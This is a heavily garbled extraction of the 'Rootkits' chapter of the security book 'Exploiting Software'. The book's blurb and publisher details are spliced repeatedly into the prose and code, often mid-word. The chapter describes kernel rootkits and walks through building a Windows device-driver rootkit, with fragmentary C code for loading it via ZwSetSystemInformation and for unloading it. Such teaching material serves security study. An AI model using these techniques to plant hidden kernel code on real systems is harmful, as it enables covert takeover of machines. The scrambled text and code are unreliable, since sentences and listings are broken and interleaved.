Chapter 8. Rootkits

Our final topic is exercising ultimate control over the machine. Ultimate control means things

the serial port on the target computer (the ultimate challenge might thus be to control the

•Index

headphone jack on the CD-ROM drive).

Exploiting Software How to Break Code

ByThisGregmayHoglundall sound,Gary McGrawfanciful, but consider that all hardware is ultimately under the control of some kind of software. Much of this software is embedded in microchips and in the OS kernel.

Once the OS has been hacked, the physical environment of the underlying computer is

Publisher: Addison Wesley

usually fully under the control of the attacker. Well-crafted, subversive programs can gain

Pub Date: February 17, 2004

and control access to the microchips and the hardware of the physical machine itself. These programs exist at the lowest layer. This means they cannot be detected unless the system uses compartmentalized (specialized) hardware.

This chapter is about rootkits—the kind of exploit software that controls every aspect of a machine. Rootkits may be run locally or they may arrive via some other vector, like a worm. In fact, virus code, worms, and rootkits have many things in common. They are all typically veryHow doessmallsoftwarepiecesofbreak?code andHowaredoexattackremelyrstightlymakesoftwarewritten. Thbreakyallonemploypurpose?stealthWhy are techniquesfirewalls, intrusion.They oftdetectionuse thesysteames,tricksand antivirustoobtainsoftwaretheir goalsnot—keepingtrickslikeoutcallthehooksbad guys?and patchesWhat tools.Becausen bewormsusedtoarebreakreallysoftwa cartegory?Thisofbookmobileprovicode,s wormtheanswerspay load. often uses many of these tricks to infect a target system once it arrives in the scene. A worm usually

Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and infects a target and leaves code behind, in effect becoming rootkit.

techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about

Why software exploit will continue to be a serious problem

When network security mechanisms do not work

Attack patterns

Reverse engineering

Classic attacks against server software

Surprising attacks against client software

Techniques for crafting malicious input

The technical details of buffer overflows

Rootkits

Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break

software.

Subversive Programs

Subversion of software is an old topic (by software standards anyway). There are military papers on the subject that date back more than 20 years. Subversion is about breaking into software using other software. The oldest references describe special "backdoors" placed into

computers were assemblies of vacuum tubes.

Exploiting Software How to Break Code

An old systems programmer once related the following story:

ByGreg Hoglund,Gary McGraw

There was an anti-aircraft radar system used on the west coast of the United States that

Publisher: Addison Wesley

had a hidden program inside. The program would display a dancing hula girl. The

Pub Date: February 17, 2004

system ran on vacuum tubes and used a light gun as part of the user interface. If you performedISBN: 0-201-just78695the-8 right series of commands, the hula girl would appear on the CRT and danceP ges:.512If you shot the image with the light gun in just the right place, the character would shed its clothing. A colonel was once visiting during a systems test and discovered this "feature" quite by accident, much to the distress of the engineering team.

WhatHow doesIssoftwarea Rootkit?break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?

What tools can be used to break software? This book provides the answers.

A rootkit is a program that allows access to (and manipulation of) low-level functionality on

the target machine. Sophisticated rootkits run in such a way that they can't be easily

Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and detected by other programs that usually monitor machine behavior. A rootkit usually

techniques used by bad guys to break software. If you want to protect your software from provides this access only to people who know that it is running and is available to accept

attack, you must first learn how real attacks are really carried out. commands.

This must-have book may shock you—and it will certainly educate you.Getting beyond the The original rootkits were Trojan'ed files that had backdoors installed in them. These rootkits

script kiddie treatment found in many hacking books, you will learn about

would replace commonly accessed executable files such as "ps" and "netstat." Because this

technique involved changing the size and makeup of the target executables, the original

rootkits could be detected in a straightforward manner using file integrity-checking software Why software exploit will continue to be a serious problem

such as Tripwire. Today's rootkits are much more sophisticated.

When network security mechanisms do not work

Attack patteKernels

What Is a Rootkit?

Reverse engineering

Kernel rootkits are very common today. They are installed as loadable modules or device

drivers, and they provide hardware-level access to the machine. Because these programs are Classic attacks against server software

fully trusted, they can hide from any other software running on the machine.[1] Kernel

rootkitsSurprisingcan hideattacksfiles andagairunstningclientprocesses,softwareand in this way provide a backdoor to the

target machine.

Techniques for crafting malicious input

[1] Except for other rootkits using the same techniques, of course. Common rootkit techniques depend on

being the first to arrive and set up camp to control a machine fully.

The technical details of buffer overflows

Rootkits

Kernel Rootkits and the Trusted Computing Base

Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break

software.

Once code is injected into a trusted system you can often obtain the same level of access as a device driver or system-level program. On OSs like Windows and UNIX, this is a devastating level of access. This means that all parts of the target system can be compromised, and correspondingly that trusted sources of audit data can no longer be trusted. This also means that access control code can no longer really control access. As an example of the power we're talking about, recall the NT kernel patch we discussed in Chapter 3. That simple patch directly illustrates the ramifications of being able to alter code memory on a target system. Now imagine a sophisticated package of similar techniques, with an emphasis on staying

hidden. That's a rootkit.

•Table of Contents

•Index

Exploiting Software How to Break Code

ByGreg Hoglund,Gary McGraw

Publisher: Addison Wesley

Pub Date: February 17, 2004

ISBN: 0-201-78695-8

Pages: 512

How does software break? How do attackers make software break on purpose? Why are firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys? What tools can be used to break software? This book provides the answers.

Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and techniques used by bad guys to break software. If you want to protect your software from attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about

Why software exploit will continue to be a serious problem

When network security mechanisms do not work

Attack patterns

Reverse engineering

Classic attacks against server software

Surprising attacks against client software

Techniques for crafting malicious input

The technical details of buffer overflows

Rootkits

Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break

software.

A Simple Windows XP Kernel Rootkit

In this section we discuss the construction of a simple Windows kernel rootkit that can hide processes and directories. This rootkit is written as a device driver and will support loading and unloading from memory. The example rootkit has been tested on Windows NT 4.0, Windows 20

• Table of Contents

and Windows XP.

•Index

Exploiting Software How to Break Code

WritingByG eg Ho lunda Rootkit,Gary McGraw

Publisher: Addison Wesley

Our rootkit operates as a Windows 2000/XP device driver. This means we must have a build environmentPub Date: Februaryto create17, 2004device drivers. We will use the highly available Windows XP DDK (device driver ISBN:development0-201-78695kit)-8 . Interested readers can also use the Windows 2000 or Windows NT 4 D (http://wwwPages: 512.microsoft.com/ddk/).

The DDK may require that Visual Studio be installed as well. Depending on the platform, you m also need the standard platform SDK. We encourage you to consult the documentation for the D version that is chosen.

How does software break? How do attackers make software break on purpose? Why are

firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?

The Checked Build Environment

W at tools an be used to break s ftware? This book provides the answers.

Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and

The DDK provides two shells: the checked build environment and the free build environment. Th

techniques used by bad guys to break software. If you want to protect your software from checked build is a debug build, and the free build is a build for release code. We use the checke

attack, you must first learn how real attacks are really carried out.

build. Once our software is working well, we can build using the free build. The free build will re

in a much smaller driver file.

This must-have book may shock you—and it will certainly educate you.Getting beyond the

script kiddie treatment found in many hacking books, you will learn about

Files in the Rootkit Source

Why software exploit will continue to be a serious problem

We program the rootkit using C. Thus all of our files end with the .c or the .h extension. When network security mechanisms do not work

Attack patterns

Building Things

Reverse engineering

To build the rootkit, "cd" into the source directory. From here, type "build" and the DDK build u

Classic attacks against server software

will handle the rest. If there are errors in your code, they will be written to stdout.

Surprising attacks against client software

The SOURCES file is very important when building a device driver. The SOURCES file may be se

differently depending on the version of DDK that you are using. One particularly critical setting

Techniques for crafting malicious input

theTARGETPATH environment variable. TARGETPATH is where objects will be placed. In the Win2k

and XP DDK, the TARGETPATH must not be $(basedir)/lib, because this is disallowed in The technical details of buffer overflows

makefile.def. The special variable OBJ is already defined and points to a subdirectory that is

controlled by the compiler. Readers are encouraged to simply use OBJ to specify the TARGETPAT Rootkits

The SOURCES setting is also important. It describes all the source files that will be used to build Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break

driver. If multiple files are specified, they must be separated and each must occur on a single li software.

All but the last line must end in a backslash.

•Table of Contents

•Index

Exploiting Software How to Break Code

(Note: There is no trailing \ character.)

ByGreg Hoglund,Gary McGraw

If we use a single basic.c file to build a driver, the SOURCES file will look something like this:

Publisher: Addison Wesley

Pub Date: February 17, 2004

ISBN: 0-201-78695-8

Pages: 512

How does software break? How do attackers make software break on purpose? Why are

TARGETNAME=BASIC

firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?

What tools can be used to break software? This book provides the answers.

TARGETPATH=OBJ

Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and

TARGETTYPE=DRIVER

techniques used by bad guys to break software. If you want to protect your software from

attack, you must first learn how real attacks are really carried out.

SOURCES= basic.c

This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about

Why software exploit will continue to be a serious problem

Kernel Drivers

When network security mechanisms do not work

Device drivers operate at ring-0, which means they have physical access to everything on the targetAttackcomputerpatterns. Under Windows, a driver is part of the trusted computing base of the compute

(Whether this is a good design is subject to much debate. Most computer security experts agree

Reverse engineering

that it is not.) Let's write a simple device driver as step 1 of building a rootkit.

Classic attacks against server software

The Basic Structure of a Driver

Surprising atta ks against client software

Techniques for crafting malicious input

The basic device driver has the following components:

to break

NTSTATUS

IoCompleteRequest (Irp,

IO_NO_INCREMENT

How does software break? How do attackers make software break on purpose? Why are

firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?

);

What tools can be used to break software? This book provides the answers.

return Irp->IoStatus.Status;

Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and

techniques used by bad guys to break software. If you want to protect your software from

}

attack, you must first learn how real attacks are really carried out.

This must-have book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about

This routine simply completes all IRPs. All this means is that we discard everything we get and

ignore it.

Why software exploit will continue to be a serious problem

Normal drivers will always registermechanismsdispatch routine. However, because a rootkit does not nee When network security do not work

communicate with user-mode programs, we can completely ignore the dispatch routine. This is good Attackform,butpatternsit really doesn't matter because we are not attempting to communicate with use mode programs.

Reverse engineering

Classic attacks against server software

Allowing the Driver to Be Unloaded

Surprising attacks against client software

Most rootkits do not need to know how to unload themselves. Once a rootkit is installed you usu

Techniques for crafting malicious input

want it to remain loaded as long as the machine is running. However, as we have said, when yo

are building and testing a new rootkit, it makes sense to have an unload routine. This way you

The technical details of buffer overflows

load/unload the rootkit many times during development. Once testing is complete, you can rem

the unload routine. Rootkits

To allow a driver to be unloaded, we must register an unload routine. We can provide a pointer

Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break the unload routine as such

software.

SC_HANDLE sh = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

if(!sh)

{

•Tableputs("errorof Contents OpenSCManager");

•Index

Exploiting Softwareexit(1);How to Break Code

ByGreg Hoglund,Gary McGraw

}

Publisher: Addison Wesley

SC_HANDLE rh = OpenService(

Pub Date: February 17, 2004

Pages: 512

"_root_",

SERVICE_ALL_ACCESS);

if(!rh)

How does software break? How do attackers make software break on purpose? Why are

firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?

{

What tools can be used to break software? This book provides the answers.

puts("error OpenService");

Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and

techniques used by bad guys to break software. If you want to protect your software from

CloseServiceHandle(sh);

attack, you must first learn how real attacks are really carried out.

This must-haveexit(1);book may shock you—and it will certainly educate you.Getting beyond the script kiddie treatment found in many hacking books, you will learn about

}

Why software exploit will continue to be a serious problem if(!ControlService(rh, SERVICE_CONTROL_STOP, &ss))

When network security mechanisms do not work

{

Attack patterns

puts("warning: could not stop service");

Reverse engineering

}

Classic attacks against server software if (!DeleteService(rh))

Surprising attacks against client software

{

Techniques for crafting malicious input

puts("warning: could not delete service");

The technical details of buffer overflows

}

Rootkits

Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break

software.CloseServiceHandle(rh);

CloseServiceHandle(sh);

}

else usage(argv[0]);

}

RtlInitUnicodeString(

&(GregsImage.ModuleName)

•Table of Contents

•Index

,daPath

Exploiting Software How to Break Code

ByGreg Hoglund,Gary McGraw

);

Publisher: Addison Wesley

Pub Date: February 17, 2004

if(

ISBN: 0-201-78695-8

Pages: 512

NT_SUCCESS(

ZwSetSystemInformation(

SystemLoadAndCallImage

How does software break? How do attackers make software break on purpose? Why are

firewalls, intrusion detection systems, and antivirus software not keeping out the bad guys?

,&GregsImage

What tools can be used to break software? This book provides the answers.

,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)

Exploiting Softwareis loaded with examples of real attacks, attack patterns, tools, and

techniques used by bad guys to break software. If you want to protect your software from

)

attack, you must first learn how real attacks are really carried out.

)

This must-have book may shock you—and it will certainly educate you.Getting beyond the

script kiddie treatment found in many hacking books, you will learn about

)

{Why software exploit will continue to be a serious problem

printf("Rootkit Loaded.\n");

When network security mechanisms do not work

}Attack patterns

elseReverse engineering

{Classic attacks against server software

Surprising attacks against client software printf("Rootkit not loaded.\n");

Techniques for crafting malicious input

}

The technical details of buffer overflows

}

Rootkits

Exploiting Softwareis filled with the tools, concepts, and knowledge necessary to break software.

You are now armed with everything you need to write a simple device driver and load/unload th driver from the kernel. Next, we will explore tricks for hiding files, directories, and processes on system.